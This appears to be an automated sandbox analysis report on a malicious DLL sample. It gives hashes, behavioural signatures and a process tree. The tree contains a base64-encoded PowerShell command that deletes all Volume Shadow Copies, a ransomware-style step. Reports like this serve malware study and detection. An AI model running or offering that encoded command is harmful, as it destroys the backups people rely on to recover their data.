Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
30-01-2022 07:38
Static task
static1
Behavioral task
behavioral1
Sample
fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d.dll
Resource
win10-en-20211208
General
-
Target
fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d.dll
-
Size
166KB
-
MD5
084c5115e946636ef03e8a555b6bf060
-
SHA1
e9f9c357dd08e653ee7ffd17943773327a18c93f
-
SHA256
fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d
-
SHA512
40d651021c4a3058d1c726bcfaea94c70c7d6fe9ffa3e3cd19db058864c018a32e26fefa3f70ddb635cb1ec31afb958112c87e2ee1e6cb1c838e8ee2a28088b6
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 964 rundll32.exe 524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 964 rundll32.exe Token: SeDebugPrivilege 524 powershell.exe Token: SeBackupPrivilege 1544 vssvc.exe Token: SeRestorePrivilege 1544 vssvc.exe Token: SeAuditPrivilege 1544 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 1472 wrote to memory of 964 1472 rundll32.exe 27 PID 964 wrote to memory of 524 964 rundll32.exe 28 PID 964 wrote to memory of 524 964 rundll32.exe 28 PID 964 wrote to memory of 524 964 rundll32.exe 28 PID 964 wrote to memory of 524 964 rundll32.exe 28
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fd4363b4f508b066bec54f0980c0d58c12248c95b0a021ca02054738bc0da94d.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:636
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544